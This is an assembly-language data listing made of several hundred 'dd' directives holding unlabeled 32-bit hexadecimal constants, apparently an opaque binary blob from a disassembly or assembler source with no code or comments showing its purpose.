dd 0E64F25C5h, 5BDB05Bh, 0FDDEA684h, 0E9B2760Fh, 65DEB98Bh
dd 6553F688h, 0EB4A7F1Ch, 9CECE7Ah, 72D4FC15h, 6A9AF0B5h
dd 17978951h, 6DEBFA89h, 0B182DC19h, 122CD76Fh, 6455459h
dd 47727710h, 2CAF9121h, 0D260880h, 338A9046h, 286E620Ah
dd 0A9E4C888h, 205DA02Ah, 0BD9F49C8h, 0ECC860EAh, 1F133FDAh
dd 3C5D1879h, 0FC664CA5h, 5D6BC151h, 2D05C108h, 25D6090Bh
dd 0A7BE0148h, 0A852378Bh, 184F98A3h, 0E2C88E5Ch, 8E7CD000h
dd 0DF408743h, 3E99BAFCh, 4EE04997h, 122F2605h, 0E81F124Fh
dd 8971503h, 0E0142A72h, 0B55ED8C9h, 0A2447D33h, 0FA29B989h
dd 6D76611Fh, 0EE4CEF5Fh, 0BD129923h, 0D47D0520h, 92A6A608h
dd 0CA63A1E5h, 752756AAh, 0C5F8D719h, 9DD3934Dh, 0F2814886h
dd 3E442B28h, 564BCD93h
dd 0D1F97174h, 879528AEh, 36619262h, 1BD21405h, 0B9FDBF6Ah
dd 74B70152h, 707D6542h, 75E32E86h, 0F59D3EF8h, 58D971C0h
dd 0B9475D5Bh, 8859071Eh, 0A022442Ch, 2C082014h, 1B7D5411h
dd 0B0F49707h, 0A8B0D071h, 0FB374057h, 38348717h, 8AFFE29Eh
dd 0FD274C1Fh, 0A44A89AAh, 0A2E27CABh, 9C425656h, 0B0AF233h
dd 33031088h, 709DF5C0h, 0FB8370EAh, 789F10C2h, 0A9C321F6h
dd 0FBF74F9Eh, 7165B52Eh, 0F3B6F07Ch, 0E719F802h, 0C4205A05h
dd 5F42C06Ch, 57927C89h, 0F9B9A56Ah, 47E22912h, 11B08C6h
dd 60E3D663h, 166F5F5Bh, 13CFAA4Ch, 7ABE795Fh, 0CD5F04EEh
dd 0E0F99530h, 0A8C217F7h, 0BE95A04Eh, 48A55288h, 0A23A365Fh
dd 3C8668C7h, 2F92B963h, 0AC334AC5h, 5AD885F4h, 0A36BAA2Dh
dd 0AF3C8A3Ah, 2291EA3Fh, 0F6ADD87h, 0C697855Fh, 5A514051h
dd 0EA601285h, 0AE157D99h, 5DF62AECh, 0A38F6F89h, 0F1A80067h
dd 5F19FDB8h, 0AFDDBD85h, 31E089DCh, 0FC432120h, 7DCC040Fh
dd 2BA7D70Ah, 180A4B62h, 70FA9558h, 0F629ECF2h, 86F32FD1h
dd 0E73C680Dh, 37E6133Fh, 85611D18h, 0EB12E1F1h, 0A11A46D2h
dd 5EE6FB80h, 14BA041Dh, 14DF8BB3h, 15034130h, 0D48FF947h
dd 0E1EE450Ah, 1A4F852Bh, 264057E7h, 4EC8A905h, 1C6518E9h
dd 0F8A7C60Eh, 0DED7522Ch, 82C8Ch, 86305CABh, 2BCDA104h
dd 695E24A0h, 7BA4929Ah, 6509C65Ch, 5D04D404h, 598A46D2h
dd 272024CFh, 6E93AD70h, 8D28E8FAh, 522AF1EBh, 9D5E0D00h
dd 0C75C1B05h, 7E573E50h, 96E82860h, 0D195D98h, 573E8C1Ch
dd 837F266Eh, 266A54EFh, 5EF99F5Dh, 11F38BB2h, 26874E43h
dd 49740BA0h, 34B0E115h, 115D0590h, 0EB97AE63h, 11121B89h
dd 8C86812Ch, 9884CAEh, 0D400351Dh, 95922A0Dh, 0C48720Ch
dd 0E72877C2h, 2C5FA60h, 28D49D37h, 0CA4585E4h, 7D0F45D8h
dd 47557A8Bh, 0B5EBF4Ah, 5E0F8C61h, 22F817D4h, 3860BD38h
dd 0AE251A6Bh, 97DFA030h, 1E2B667Fh, 0FC1B4148h, 6574D94Dh
dd 0CDBE7DECh, 88838142h, 0D714F61Ch, 2A46DC23h, 0B1101718h
dd 1700B440h, 0B8A45DD1h, 0D6D822F9h, 761E55F5h, 565F1065h
dd 0CBAEE357h, 7BD979A4h, 3BAC3F05h, 0F17C7C15h, 0BC3AFEC3h
dd 27416C22h, 2C7A450Eh, 6CED7FA2h, 0FF2A6862h, 0E177977Eh
dd 868DF4B5h, 0FA8226F2h, 20925697h, 0FAAECFA4h, 64F530FDh
dd 0FABCBFC7h, 0C5FEEE17h, 16428A07h, 0D838AF70h, 5CAF2AEAh
dd 82B69482h, 4845630Eh, 9592CB3Fh, 99732A8h, 0ABE158A5h
dd 2A02602h, 0A4882861h, 537FC040h, 0A52913C4h, 0FF55A56Ch
dd 8D200039h, 66C57B18h, 417B1D06h, 0D4552521h, 319CA5C6h
dd 95F1F168h, 89829DC2h, 0F6C0288Fh, 0D6D732D2h, 3D7FCE1Ch
dd 0C66A4A68h, 4BA7B7BFh, 5004D16Ch, 0EE986E37h, 3BD28C42h
dd 9FB59957h, 7064F9A7h, 66A58157h, 79CD0766h, 0E9C35013h
dd 6317591Ah, 0B31D5784h, 81A67AE9h, 548BC3ACh, 1A3096Eh
dd 2552D855h, 247CAF63h, 584D797Bh, 0EB811310h, 0AAF4F621h
dd 0C0C5963Ah, 5402F403h, 480EA24Fh, 9120A189h, 3B35012h
dd 4420A230h, 0E5D60990h, 0A2FFE900h, 0B8BA3BC6h, 7740A03Eh
dd 0E44E85F4h, 61206923h, 1406C9DDh, 0D4C3A302h, 1ECD5705h
dd 9F88C450h, 47C0AC05h, 50E8D671h, 0A298D123h, 3782094Fh
dd 0BBF8B80h, 0BB07A25h, 0BCEF2650h, 7572174Bh, 0F786830Fh
dd 0BCAED08Ah, 815D3986h, 2904CD34h, 420AA1C0h, 648B2D30h
dd 62670F16h, 2EFDEF86h, 1CC2FFA4h, 52C08240h, 1E5D492h
dd 0A6EE3480h, 0AC1124A8h, 0CEDCE0AAh, 0F0AE1A1Ah, 9B046485h
dd 611E9C7Ah, 39665955h, 81BE0886h, 9B35416Ah, 67BAC6A4h
dd 0B74B8D40h, 89B3A43Eh, 381B5A0Ah, 7EED5A2Bh, 0D6B2E9BFh
dd 18EFA7E5h, 3BA2CFA4h, 917332Ah, 2B234518h, 36330EF3h
dd 5325875h, 35362015h, 0C878860Bh, 88280AA8h, 7AFA6B5Dh
dd 28362831h, 0FF001F89h, 7140B43Ch, 556AAA81h, 38CA5756h
dd 7ACE8AC6h, 0C72A3B12h, 0DEE7C4BAh, 0DC0F6318h, 846A196Ah
dd 9D15EA0Dh, 32ED0A80h, 632D70DEh, 0CA869619h, 833DE959h
dd 28835BDh, 4A071D5h, 37DF2078h, 0B6A366A7h, 5BAA85FFh
dd 649945Eh, 4CA90664h, 7868A84h, 32C2BFECh, 7C38FF30h
dd 0C20F2745h, 4EF08B87h, 0FC2BE0EDh, 0AEFF1E2Bh, 8BAC9538h
dd 105D7110h, 8A678548h, 6D5F455h, 32A91FA1h, 6BBF7C4Bh
dd 72379CA3h, 67D77A1Ch, 22F34627h, 0F8997EEEh, 0DDB713ABh
dd 4564C2EFh, 0F2FA950Ch, 2E9DC43Ch, 8E168065h, 45246028h
dd 0E5CA51D0h, 2817B7F6h, 2577FD6Fh, 8AA74E16h, 0EB68636Eh
dd 21779675h, 0E0714A29h, 6BFAB4E9h, 4760B2B4h, 0EE2B8780h
dd 0C88862B2h, 974973ECh, 7819553Ch, 0DD1B400Ah, 2C679541h
dd 295288D0h, 9515FB8Bh, 0B22E6EAEh, 85C21D61h, 1187873Dh
dd 14ABBE37h, 64578AD9h, 555D2AD5h, 3BEB4B73h, 0EFCA6501h
dd 5EC55D65h, 0E1F577E5h, 4EAABCEAh, 9DF78947h, 0FA57F55Ch
dd 55C1986Eh, 91CBD7BDh, 0A93AB364h, 0C0B6AD53h, 3B63B91Fh
dd 0BDCA5200h, 0AFBFD3E8h, 59A182CEh, 514D712Fh, 63EFB68h
dd 0B512BF24h, 8262342Fh, 5D2B0D1Dh, 62455962h, 5B192BEBh
dd 0DB82DBDFh, 3302D92Ah, 652A9BFCh, 388A880h, 65DA557h
dd 8AEF639Dh, 38847322h, 0F5C65008h, 585EB590h, 4B049498h
dd 0A6FF6911h, 7C100015h, 32DF4B70h, 718882B0h, 6EF5FA29h
dd 83A3F832h, 40BEC700h, 0EC428D86h, 8DCD418h, 3FD6E90Dh
dd 0EB814995h, 0C810DFE3h, 8A6E80A7h, 812616Ch, 0AE028D0Dh
dd 74E4174Ah, 9B176C8h, 0E2ECFAEDh, 8B249A59h, 0C85589DEh
dd 0E4327690h, 0B20F6168h, 89CA0AA1h, 0F9D75392h, 67EEB34Eh
dd 6DC45961h, 37FCD93Ch, 38D7D25Ah, 5C9154E6h, 440A35CFh
dd 7186753Eh, 0AE1E900Dh, 0ED95AE77h, 4FB8AE95h, 67C65E3Fh
dd 2D95D945h, 593C46E9h, 0B23D9D5Eh, 0BABCAA51h, 7940C8ABh
dd 0EDCDB459h, 0F8104E6Bh, 0A84924CAh, 90E673F9h, 0E13AD28Ah
dd 7579E7B7h, 66B3DC7h, 57BEC4FEh, 9DCEB1BEh, 41A7E30Dh
dd 74D8339Fh, 0B2801153h, 5F9836Bh, 258C84E9h, 8826EE5Dh
dd 9014CA48h, 1DAF2A8Dh, 3D72708h, 119D0447h, 90CE46C5h
dd 406570DBh, 93E89591h, 2848AF8h, 60F535B1h, 0EE911F40h
dd 7C791841h, 5458E0FAh, 5D3BD15Ch, 0A3815D67h, 7E76A7CDh
dd 8605CFC0h, 38378273h, 0A720D9Ch, 90A15908h, 5D99EE90h
dd 834750D4h, 2C6C2132h, 80CDFB26h, 0EF7A1B23h, 7C68F068h
dd 5C16FCEDh, 96D583FAh, 63AD8EDDh, 0EEEC9C3Eh, 1EFAD462h
dd 0DF9F5FA2h, 55DA0115h, 0ED10795Dh, 3FD4688Eh, 0FC775499h
dd 91021A91h, 45486882h, 85439509h, 0E1A80424h, 0B43F963Eh
dd 4D8843Bh, 0A16AE189h, 231E8556h, 0EE78FF5Ah, 1905F776h
dd 6C05B6D0h, 76EEDF82h, 0D6191287h, 8B5F0EEDh, 0C01C504Eh
dd 0CA212492h, 0E366834Eh, 70CD7696h, 92018571h, 0EB979E25h
dd 6B886776h, 7612C36Eh, 0DDBBBBBBh, 94958875h, 0ECB728C0h
dd 0BFECFAF6h, 9668455Dh, 0C582EEDDh, 0F304E164h, 3A661E06h
dd 64546422h, 4BA8CA88h, 0ACDB8A4Eh, 87373320h, 0C5996653h
dd 0B0267B07h, 952EEB85h, 86DDC58Dh, 6AAB1052h, 562B92D6h
dd 45D51A8h, 2B692EB5h, 0C06650FAh, 0AD3E9B0Bh, 0E752B97Ch
dd 0A8FC4ADAh, 0E2647E03h, 69D01B49h, 97783F06h, 0BDFF544Dh
dd 0E10880CBh, 21F9228Fh
dd 0D210F452h, 4EA74B85h, 7ACC5CE4h, 0D4B46AFAh, 0B7FE80A7h
dd 54160D0Fh, 64682BB8h, 0B6FCD075h, 7E5DCAD2h, 4F471C56h
dd 0AD7C0BB9h, 86B2FC13h, 0C3E2AD97h, 0E0BA0185h, 504CC80Eh
dd 6553A833h, 6E93207Ch, 0AA44C040h, 0FD75555Fh, 0D420C190h
dd 4B208ECAh, 0FD83910Ah, 8E284288h, 93AA8641h, 4035839Fh
dd 7AA49186h, 0A4EC6DF8h, 0C9135DFAh, 34E5FC46h, 67146FAh
dd 0EF34455Ah, 967D92E8h, 4D17915Ch, 0FCE70977h, 4C0AC457h
dd 238EDC07h, 0FBBB8B85h, 0E5E1E59Eh, 4A2BB39Dh, 26CA9E2Ch
dd 1C04CDD1h, 0BB18FB22h, 0AACB18D3h, 7A8DD52Eh, 38B453C8h
dd 39040872h, 745D8A69h, 0B2CE8BA4h, 710CDF5Ah, 8B2E72BAh
dd 1A0677E7h, 0FB2505D4h, 4C8F444Ah, 8D3EF97Bh, 2D510DD7h
dd 8DAB2C7h, 709831Eh, 0CC85FFDDh, 5F15BBA0h, 0B129BBF7h
dd 14DDDCB0h, 19D1FBCh, 0DA0483ACh, 5478C19h, 0DE8A3CF5h
dd 0A6B72D34h, 8D3C72B8h, 12EEFB1h, 83AB0C9Dh, 0A85F0AEFh
dd 0DA8CE0A1h, 0B8728FB7h, 5649D56Ah, 0D465FCFBh, 6834CB40h
dd 0C6835143h, 50EE0A71h, 0E1A1AF41h, 20113E85h, 0C8D322AAh
dd 2B669044h, 0CA92645h, 55A36BDh, 3CCCB3D3h, 0F1A5E91Bh
dd 13AE9CC1h, 408C1EBCh, 31FC0846h, 9D56FE58h, 0B332DC60h
dd 0E6668D98h, 0ACFDB64Ch, 0BE7FD528h, 56FFF38h, 0E3DA07C3h
dd 75BC78BEh, 0CB4867B1h, 0F937D1D9h, 47DDB26Eh, 0E3615977h
dd 7C9D74B0h, 91459BD7h, 777C3CEFh, 0BA6D2E71h, 0F5F79F6Ch
dd 782B80D5h, 5019783Eh, 1F85A33Ch, 6C549CFCh, 210C0E4Bh
dd 0EAA6E351h, 0C71D8C2Ah, 9B481199h, 9DD5552Ah, 0CBC7FEABh
dd 1C55A169h, 44D5C211h, 0A49385FBh, 3925613Ah, 0A2E89EBFh
dd 7E0A523Ch, 0E82C6679h, 60CF69EBh, 610105D1h, 0E32243D5h
dd 20EB0E46h, 13295D4h, 0E59DB842h, 9B4462B5h, 0AD46F086h
dd 0E58AC85Ah, 7A56EF22h, 0E7F02CA2h, 0F88EAAB3h, 5C6557F9h
dd 5D68ED82h, 0F93039D5h, 34DB2BE2h, 55A4797Ch, 0C65685D6h
dd 5BFF4DF6h, 35D6A820h, 110BFBFh, 0CB553A6h, 8C1F6921h
dd 0F9492094h, 407680AAh, 940DF175h, 2014449Dh, 97CB689Bh
dd 883BB414h, 3C6E228Ch, 2D18F596h, 0F08C4591h, 926D0779h
dd 0E63E7BC8h, 13C02507h, 0FE49AF45h, 967BAF63h, 84F46AF5h
dd 0A421AE90h, 0D649308Eh, 0F2458F1Dh, 0DFFB7749h, 4ABA307Ch
dd 774EBA72h, 0F8B5E094h, 0FB59574Eh, 0CD3E9DDAh, 5F0D45F6h
dd 7505D02Ch, 0C41DDD39h, 749088CCh, 69995B01h, 76ABA839h
dd 0ABBA65DCh, 14F462F8h, 74F85D67h, 0B880EFBBh, 0C270AFB7h
dd 6330B478h, 20CC2F3Eh, 8F2B233Eh, 0E7599CDFh, 80E0A909h
dd 410B6851h, 18939826h, 733A7228h, 2E90DFF8h, 0C0415015h
dd 0D7B297D3h, 105FC117h, 22BAC41Ah, 7F1AF948h, 45FA9749h
dd 0BCD24320h, 0F2E96C9Eh, 9C16ADEAh, 23CE1379h, 5BBC874Eh
dd 5BD96505h, 9595D665h, 3BA83AB9h, 0FB08014Eh, 4D0E5248h
dd 8F3FC547h, 7AF909C3h, 47AAF6A0h, 9B724DD5h, 2531C2FDh
dd 4C1FFA1Dh, 0C4960DF4h, 885FE5BEh, 3E90734Dh, 548E2413h
dd 0BFD5E62Bh, 6A841549h, 0D45F46ADh, 62D2AAD6h, 0F4EC45F2h
dd 52097DAAh, 67F033EEh, 6C0C579h, 0E12C33AAh, 19154287h
dd 27C9AAB6h, 7190E9Dh, 0C3362B83h, 79C91BA2h, 7A8207C7h
dd 6A800D49h, 0C50342DBh, 507DB1B9h, 0B40A44E8h, 62317BA7h
dd 0C0B3927Bh, 0C88425F9h, 0F25AEE3Ch, 54402F90h, 0AADBAC2h
dd 6030DF7Fh, 0F156242Ah, 3605AB69h, 3D3AB990h, 3FE91E13h
dd 0B36CDAADh, 0F6E403F9h, 6ED2CE5h, 2AFEC6B1h, 0FD25769Ah
dd 7806D021h, 0C7B537D1h, 5E47D68Ch, 3AC87EFAh, 10D2455Ah
dd 0EBC79153h, 0ABD5AB62h, 0A33520C5h, 0ABA78CF6h, 0F049D6F3h
dd 14B48938h, 9E625F0h, 0C15667CFh, 7B15E3ACh, 3056B423h
dd 355F242h, 59B53DF0h, 2BF5D52Bh, 0EAB26C73h, 5A29436Bh
dd 186AA496h, 67478C63h, 1BA40D25h, 3460F80Eh, 0B1F452D1h
dd 2CAC280h, 82E34B42h, 0CE660E4Fh, 65A814B6h, 0C319A147h
dd 570E3AF6h, 0D4A74949h, 0C4C546h, 0A045C0F0h, 45A05AEh
dd 0A29FAEBCh, 0B3DF0DF6h, 0DDA2C6CCh, 0E664055Eh, 4825EA9Eh
dd 81509FDFh, 6490CA13h, 0CE800234h, 84C711F5h, 941D9E08h
dd 1BB942CDh, 5D239943h, 8306F8E2h, 78831A1Fh, 655E487Bh
dd 0F789EC1Ch, 6A5999CEh, 6CF24030h, 4D58E72Bh, 75B9766Bh
dd 0B6F301D5h, 0EC1F28AAh, 7E862F91h, 0EEBE605h, 0AFF900A4h
dd 0DC3014D0h, 0C358F92Bh, 0B3031FC4h, 0DE121A3Eh, 0A2CD79FBh
dd 6AF5DC7Eh, 0C1702734h, 0F686BAE3h, 0A7108033h, 1B18D040h
dd 8CDA96D1h, 6F2097A3h, 0E051B3E2h, 2DF0535h, 0D22CD1E5h
dd 2A03095h, 25DE899Ch, 5691B7D0h, 4C818601h, 9BB02B6Ah
dd 0DFDF9406h, 68C815A3h, 4FF8738Bh, 3C6BE028h, 7B39394Ah
dd 8EA4B7E2h, 343E4A23h, 7B1BE1CBh, 1BA951C1h, 521A9EB9h
dd 51880FC7h, 3A9D9748h, 2479E80Fh, 7F151957h, 0A3A9E3C8h
dd 0D6CB73A6h, 536A1C51h, 9F440109h, 0F3951C01h, 226A3F06h
dd 0A8678C5Fh, 0A57DD8F4h, 7EA24E56h, 21FA1BA4h, 0AEFA6420h
dd 0F034207Ah, 0C1530A7Ah, 9B556A6Fh, 0C56F8480h, 807B0D1Fh
dd 4399EE1Dh, 0E72A04BAh, 58394B4Ah, 0C1AFB502h, 41112A91h
dd 30BB12EEh, 77255561h, 64699044h, 265E5535h, 72FC577Bh
dd 0BF382080h, 0E01C7C0Ch, 63AEEA1Bh, 0B09A0288h, 95013143h
dd 990FC411h, 21CFF5D6h, 4410A97Dh, 0E4D208EAh, 0D824D026h
dd 9146C272h, 154B812Dh, 0E6D1368Ah, 59041C09h, 0CC094882h
dd 0C139568h, 99D2DC1Fh, 0CC42EFD1h, 9F01B0h, 0B04A6203h
dd 747D03E4h, 5FEC288Ah, 445326A6h, 99F4EA50h, 0B09683E9h
dd 4D6E647Bh, 79608130h, 99428205h, 0E1B892CEh, 4293F984h
dd 6A20BF82h, 42A70C88h, 90438C0Bh, 520409A2h, 720C9104h
dd 64B87240h, 0AB2DCEC6h, 6E96772h, 8D13A91Fh, 8400357Fh
dd 7100B49Ah, 8A8CEC31h, 72104A59h, 3EBFA13Dh, 98162128h
dd 9B71E29Ch, 0F61724CBh, 0F00881E7h, 0F046CB3Bh, 0C75FE907h
dd 1FF2A068h, 0F1AB3FC8h, 86072073h, 2087C9A1h, 0D8D9C3Fh
dd 124DA16Ch, 1454205Fh, 3338129Bh, 0FFB1C13h, 882712DEh
dd 904E7689h, 1C8325Ch, 0E9266FA5h, 0E78BC72h, 31D9C1D8h
dd 0A5AB40C2h, 83B02208h, 625E1100h, 1C150B71h, 0B9A11ECCh
dd 8055EA1Eh, 0A1439A44h, 18EE3C6Ch, 647841D3h, 0A28685D1h
dd 7077200Bh, 4D20BBB0h, 0A2A7B37h, 15E52AB9h, 0C8D26BFEh
dd 5CA1FF8Dh, 0C1262BECh, 2924E749h, 5044FF01h, 50244FDAh
dd 12B24FBAh, 0FC5C4F7Eh, 80CA0D7Dh, 387B04B7h, 0CC4FE8DDh
dd 0FA41AFFFh, 6422E92h, 651848F0h, 5611CA5Dh, 90691873h
dd 0F60DDC13h, 0AB232FFFh, 200810D6h, 482292C2h, 0D2185F74h
dd 707D07FDh, 0FEC7B082h, 1748107Eh, 1B423021h, 1EB0A874h
dd 48F8340Ah, 0A5215883h, 2C850D6h, 3F94C84Bh, 3B34187Dh
dd 48FF4022h, 0DD011A81h, 1FD8AE0Bh, 0AE7BC286h, 582A3ACEh
dd 1B7DF959h, 4974212Ah, 1CB68761h, 0DEAF8A61h, 20B990F5h
dd 0D64CC4ABh, 728F75Bh, 2C0131EAh, 0E6A2B3B3h, 0FB46828Ah
dd 9CB360D1h, 0F3D6C23Fh, 28C83445h, 32119080h, 10AC256Ah
dd 52A862D9h, 4C8DA826h, 0ECFB9937h, 51DC2562h, 0FC1D9565h
dd 22808CF7h, 0E218D82Fh, 3D74B250h, 3021BDD3h, 367A860Bh
dd 16524B18h, 4E32E64Ch
dd 10DCF51Eh, 22EC9B42h, 65942230h, 1B518AE4h, 68DA47F9h
dd 2487025Fh, 99C5328Ah, 0B170D29h, 85D51AC4h, 723EF310h
dd 48793F87h, 36B721D4h, 1F2FCC90h, 52419871h, 0E507A2C6h
dd 0C0F51DCh, 0BD882BBFh, 0AFCF048Bh, 0F5F64861h, 786639B2h
dd 86251BDDh, 0EAB17CFBh, 0C3611EE7h, 47AE5411h, 5F4D1822h
dd 0D274B04Ch, 0DBC46239h, 0C888AC87h, 20511729h, 0FF0359B1h
dd 76FAB881h, 4C204276h, 20CAAE51h, 1F5E525Dh, 0E01CF224h
dd 23038DB4h, 3C383BDDh, 3ADC4D32h, 0BB9B003Ch, 597F63C0h
dd 10B6C05Ch, 85480520h, 0EE8BB0F5h, 26BC6057h, 0F9FDBF4Ah
dd 9C663597h, 0BA88C5B6h, 6EE168A1h, 964DB34Eh, 7CCF0B56h
dd 95E593CFh, 3E808016h, 0F997531Ah, 0FA388C74h, 3BFC489Dh
dd 0B8CB0390h, 0D8745D7Dh, 505070D7h, 0ADAB1DCh, 1045A9DAh
dd 0AACBA0AAh, 0F0203F02h, 7063D9BDh, 218140BDh, 4D083010h
dd 8D2ED61Fh, 6900E833h, 8671E807h, 7FC94618h, 4BA57A0Bh
dd 2F91DB60h, 0B87A9280h, 1917DBE7h, 0AA8057DEh, 52274AF3h
dd 2DDC3BD0h, 2C1F76DFh, 8EF31D54h, 8EAA0423h, 581625BEh
dd 0F9F15A5h, 0D650492Dh, 1DE618A5h, 21AEB8A8h, 0C709C34Dh
dd 0FBDEBF5Ch, 849856DDh, 3DD0CA84h, 33366C6Bh, 7A83C0AFh
dd 0CDB08271h, 3D5983EBh, 2812E503h, 0D57D7EC1h, 3DE01200h
dd 10843EADh, 0A02E0509h, 15050708h, 38DA431Ch, 82C9D7C4h
dd 0FEBF217Dh, 94C0C4Bh, 0A07AE29Dh, 0BC6260C1h, 689EBAD0h
dd 69A1B514h, 276F2FB1h, 0B68829h, 8D8F2280h, 0C24001FFh
dd 30EA5F02h, 9774CB02h, 9253CF46h, 25031967h, 6671649h
dd 0E3BAFD50h, 40117528h, 1A30D74Ah, 95FDAE8Ch, 32D7CDC4h
dd 5904908Eh, 92B7BB20h, 9C53656Ah, 32C71044h, 0D0CA7BA8h
dd 1455E348h, 0CF29832Ch, 0CB3C652Ch, 0B7A3EA70h, 312F9032h
dd 1C94083Ch, 0C4078FAFh, 0D9FEE1A8h, 40B87219h, 33E80849h
dd 31695676h, 50C25585h, 0BFE5FD0Eh, 7C17E20h, 0F8618407h
dd 188504C0h, 587FF801h, 35219B51h, 2C0D9ADFh, 87C2A67Dh
dd 853FF618h, 72E0FF75h, 3182A1A8h, 320A5005h, 0AC0267FDh
dd 0EE3FA084h, 52156094h, 707C17F5h, 3D7E599Dh, 1FC8282Dh
dd 8942A358h, 8AE26EABh, 0D142182Ah, 0D7D15102h, 0B20B344Fh
dd 0F01275F3h, 8E906A92h, 534617DBh, 0BE9B719Ch, 21C116F7h
dd 4687302Fh, 50AAB363h, 0A5B7A253h, 652BF72Bh, 95174A4Fh
dd 14E8ACE6h, 8149EF2Dh, 27E8D961h, 0EC00855h, 0F52BB9BDh
dd 91034100h, 0F438EC20h, 0FF9DFE61h, 0C18063DFh, 6040F04Dh
dd 0A8A9A193h, 970933B6h, 4940CEE9h, 0B6C5B89h, 5D56E3B0h
dd 0F534154Ch, 32B61DC1h, 8E3A14F1h, 518D22A7h, 2D9BD174h
dd 2490136Ah, 5020EECFh, 9EDFFDFBh, 83522C02h, 0D9BE8981h
dd 9799D337h, 0D904BAACh, 58E5048h, 0BE507DFAh, 835D1F85h
dd 409C4520h, 0DEBC0B69h, 4C6803C5h, 2C8598A5h, 0BE05BFE6h
dd 7AE0F6E5h, 0DCF592E1h, 0ECD31E66h, 321A5102h, 0AAE11826h
dd 2473A06h, 0E10D4E85h, 484FB139h, 0B24D0969h, 972FD0CAh
dd 58335903h, 5D6841DFh, 479D3722h, 3CABD0F5h, 658250C4h
dd 0BD20AE95h, 2122500h, 0EB0F0E3Fh, 598764ABh, 28F5CD73h
dd 0B7DE5787h, 0A13B8770h, 11BFB55Dh, 0D94FD7BAh, 228F0C27h
dd 5562C698h, 38065CDCh, 4C55CB8Bh, 84AA7CDFh, 0ABA85629h
dd 0AE54063h, 2BEFF522h, 882F927Fh, 86F63440h, 5A3EE485h
dd 7B1880FEh, 0C4FE823Eh, 0A095BA96h, 25D42B32h, 0F4B2541Fh
dd 0A0BF355Dh, 501AEE7Dh, 0D2BCC671h, 1D64B5D1h, 1CB1DCEBh
dd 48B04362h, 2B2CA104h, 0FB1A1776h, 0F4CA2316h, 0ADC2049Dh
dd 32E57BE3h, 4FC5477Dh, 80EFA831h, 1DF441F2h, 0BB2AA65Bh
dd 3829C668h, 0CBB2715Dh, 33AB0C55h, 0D10496A8h, 3F91CD52h
dd 8181882Fh, 0FC33FE19h, 0F5C545Eh, 0ACA3FE21h, 9F912B1Ah
dd 9E4D6B8Ah, 5A385700h, 16C21D7Eh, 2295B8ACh, 0C61F9D84h
dd 1DC73648h, 0BB4F56E1h, 87693EE3h, 0D270C6E2h, 51A5BCC5h
dd 0D88D0067h, 8C9DA57Dh, 0A3AD4D76h, 0D0C64A6Fh, 1D5CFEC3h
dd 4AF2A317h, 31B542D7h, 128ABD19h, 759B7D64h, 72215E19h
dd 37175655h, 45EE52C1h, 0CC4844D6h, 7656BDC7h, 877FFB8Fh
dd 59A3665Dh, 0F7EA274Dh, 0EAAE4EFEh, 9A13DE04h, 7A2965EAh
dd 184E64E9h, 0DFBAC7BAh, 3B5596D5h, 74DF0770h, 0C35C61A3h
dd 0E28EE44Dh, 36E331A4h, 8F06AB9Bh, 510EA68Eh, 936BEA0h
dd 0D7E4C636h, 0F8AAA855h, 24C563Eh, 56D79D74h, 77984FE6h
dd 48E8FC5Dh, 2A61EA08h, 0B0C7D347h, 0C0FB1404h, 32275A7Ah
dd 271D605Dh, 8095AEB6h, 2F3E4677h, 3324758Ah, 3CAB6613h
dd 44661AE9h, 0C93A2FB8h, 8DA45CEh, 7017E92Bh, 9DE08309h
dd 6B5F17EFh, 16EC5F65h, 5D204502h, 4320F50Fh, 0CF97ABB8h
dd 20722C9Fh, 0BC05ADB5h, 6CB9636Ch, 8E355CDBh, 12BEC06Ah
dd 2D207CD3h, 0DF2643ACh, 0D4127C18h, 7B051655h, 9A2FD47Dh
dd 66F29A0Eh, 8E4AB14Dh, 4FC133EAh, 0CF643079h, 0FEBA4EC1h
dd 93B58043h, 67FEAB5Fh, 6B34A103h, 0B1700110h, 0C01F354Eh
dd 4212AB29h, 14276712h, 34038AEAh, 6BB6659Ch, 9519CA04h
dd 1D59ABDBh, 15446A0Ah, 51E09EC4h, 358345Dh, 0DA258782h
dd 77FC9197h, 0D18A90D1h, 0E152B394h, 3544E557h, 2B7A805h
dd 59951C36h, 0FC7774C7h, 0CE8334C9h, 14E5AF1Ch, 78DD8F05h
dd 0DAC86FBAh, 58F9FC19h, 76C662AAh, 0BD435ABAh, 0EAF15157h
dd 2BC2778Ah, 8E71FCFAh, 0BCEAC478h, 9D67305Fh, 0ACABBCB3h
dd 7F39D174h, 0E448C5C4h, 0F33AB98Bh, 4175F94Ah, 72576405h
dd 0FEA19888h, 30C0F08Dh, 0F4E2F88Eh, 7625DFDDh, 754D8BFEh
dd 0E7F15713h, 0BEA45509h, 693B9758h, 9DF0AD1Ah, 0A548A40Fh
dd 0BA8BB38Bh, 63315D78h, 37B1B556h, 8663BBEh, 820A1D41h
dd 0AE2F157Fh, 751F65C8h, 9BC987EBh, 28BE53AEh, 0B664DED4h
dd 106B13A9h, 0F3ED7EAFh, 0AF1FFA86h, 84BC77E7h, 82B3875Dh
dd 1A902241h, 0DC37BC64h, 769F8499h, 3882269Dh, 2F95A3EDh
dd 0FF5BBAB7h, 0AF7B440Ch, 0DFEE6FA7h, 0DDB93BFDh, 6FF337C1h
dd 7B8EDAEAh, 75612345h, 185BB511h, 0BFCB3CF8h, 665E4893h
dd 0F5A534A4h, 0F975BC0Ah, 7F8717CCh, 55F694B1h, 0CACA4DD4h
dd 0A71260Ch, 0FB164637h, 7D884138h, 41F6406Bh, 0C7147A09h
dd 0D79D1F0Bh, 53280F18h, 1AAB9075h, 555A939Fh, 0F9B4C40Ch
dd 2E571ACEh, 77789F21h, 0E148B875h, 22997B2Dh, 3421C2AAh
dd 817C7671h, 15568EA3h, 1B558654h, 0A71D69A9h, 88AE448Eh
dd 5F187F28h, 0C4131B05h, 43AFF60Fh, 0D59E9D29h, 0C685465h
dd 1FB6EC72h, 1DBCEC42h, 58CCA0C1h, 240B08ABh, 0DF1451C9h
dd 9F54810Fh, 14FDABAEh, 0FEDE8FEh, 6684950Ch, 0A7AABAE8h
dd 1409042Bh, 23879301h, 80A408F2h, 2E1D427Bh, 44648DA6h
dd 86BC8DA6h, 9CA898A2h, 0CFAE5812h, 67300E20h, 0BD7E4EC1h
dd 0F3B4840h, 0D608BFCh, 90938C2Fh, 0C8ABD618h, 34947547h
dd 925E76Ch, 0B202DB0h, 6B422250h, 4C5F7C75h, 0DE062BB9h
dd 0CA263170h, 6AB3015Dh, 0E57B29E1h, 0A0CDE25Dh, 35DC06Fh
dd 0AE193269h, 62334B2Fh, 5BE24676h, 0BC01FB36h, 0FC5FC1DEh
